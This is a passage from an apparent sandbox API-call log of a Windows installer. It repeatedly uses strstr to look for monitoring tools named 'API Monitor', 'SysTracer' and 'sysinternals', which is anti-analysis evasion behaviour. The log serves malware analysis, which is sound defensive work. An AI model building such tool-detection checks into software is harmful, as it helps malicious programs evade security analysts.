returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.552] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.552] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.552] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.553] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.553] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.553] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.553] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.553] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.553] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.553] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.553] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.553] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.553] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.553] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.554] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.554] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.554] lstrcpynA (in: lpString1=0x341200, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.554] lstrcpynA (in: lpString1=0x340df8, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.554] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.554] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.555] lstrcpynA (in: lpString1=0x341200, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.555] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.555] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.555] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.555] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.555] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.555] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.555] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.555] lstrlenA (lpString="0") returned 1 [0158.555] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.555] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.555] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.555] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.555] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.556] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.556] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.556] lstrlenA (lpString="0") returned 1 [0158.556] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.556] lstrlenA (lpString="") returned 0 [0158.556] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.556] lstrcpynA (in: lpString1=0x337684, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.556] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.556] lstrlenA (lpString="3399936") returned 7 [0158.556] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.556] lstrcpynA (in: lpString1=0x40a418, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.556] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.556] lstrcpynA (in: lpString1=0x337acc, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.556] lstrcpynA (in: lpString1=0x432800, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.556] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.556] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.556] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.556] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.556] lstrlenA (lpString="") returned 0 [0158.556] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.556] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.556] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.557] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.557] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.557] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.557] lstrlenA (lpString="") returned 0 [0158.557] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.557] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.557] lstrlenA (lpString="") returned 0 [0158.557] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.557] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.557] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.557] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.557] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.557] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.557] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.557] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.557] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.557] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.557] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.558] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.558] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.558] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.558] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.558] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.558] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.558] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.558] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.558] lstrcpynA (in: lpString1=0x3401e0, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.558] lstrcpynA (in: lpString1=0x340df8, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.558] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.559] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.559] lstrcpynA (in: lpString1=0x3401e0, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.559] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.559] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.559] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.559] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.559] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.559] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.559] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.559] lstrlenA (lpString="0") returned 1 [0158.559] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.559] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.559] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.559] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.559] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.559] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.559] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.559] lstrlenA (lpString="0") returned 1 [0158.559] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.559] lstrlenA (lpString="") returned 0 [0158.560] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.560] lstrcpynA (in: lpString1=0x337684, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.560] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.560] lstrlenA (lpString="3399936") returned 7 [0158.560] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.560] lstrcpynA (in: lpString1=0x40a418, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.560] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.560] lstrcpynA (in: lpString1=0x337acc, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.560] lstrcpynA (in: lpString1=0x432800, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.561] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.561] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.561] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.561] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.561] lstrlenA (lpString="") returned 0 [0158.561] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.561] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.561] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.561] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.561] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.561] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.561] lstrlenA (lpString="") returned 0 [0158.561] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.561] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.561] lstrlenA (lpString="") returned 0 [0158.561] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.561] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.561] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.561] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.561] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.561] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.561] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.561] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.562] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.562] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.562] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.562] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.562] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.562] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.562] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.562] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.562] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.562] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.562] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.562] lstrcpynA (in: lpString1=0x341200, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.563] lstrcpynA (in: lpString1=0x340df8, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.563] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.563] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.563] lstrcpynA (in: lpString1=0x341200, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.563] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.563] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.563] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.563] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.563] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.563] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.563] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.563] lstrlenA (lpString="0") returned 1 [0158.563] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.563] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.563] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.563] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.563] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.563] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.563] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.563] lstrlenA (lpString="0") returned 1 [0158.564] lstrcpynA (in: lpString1=0x33723c, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.564] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.564] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.564] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.564] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.564] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.564] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.564] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.564] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.564] lstrlenA (lpString="3399936") returned 7 [0158.564] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.564] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.564] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.564] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.565] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.565] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.565] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.565] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.565] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.565] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.565] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="131238") returned 6 [0158.565] lstrcpyA (in: lpString1=0x430400, lpString2="131238" | out: lpString1="131238") returned="131238" [0158.565] lstrcpynA (in: lpString1=0x3401e0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.565] lstrcpynA (in: lpString1=0x33723c, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.565] lstrcpynA (in: lpString1=0x430000, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.566] lstrcpynA (in: lpString1=0x42e3a0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.566] lstrlenA (lpString="callback1") returned 9 [0158.566] lstrcpynA (in: lpString1=0x40ac18, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.566] lstrcpynA (in: lpString1=0x40b018, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.566] lstrcmpiA 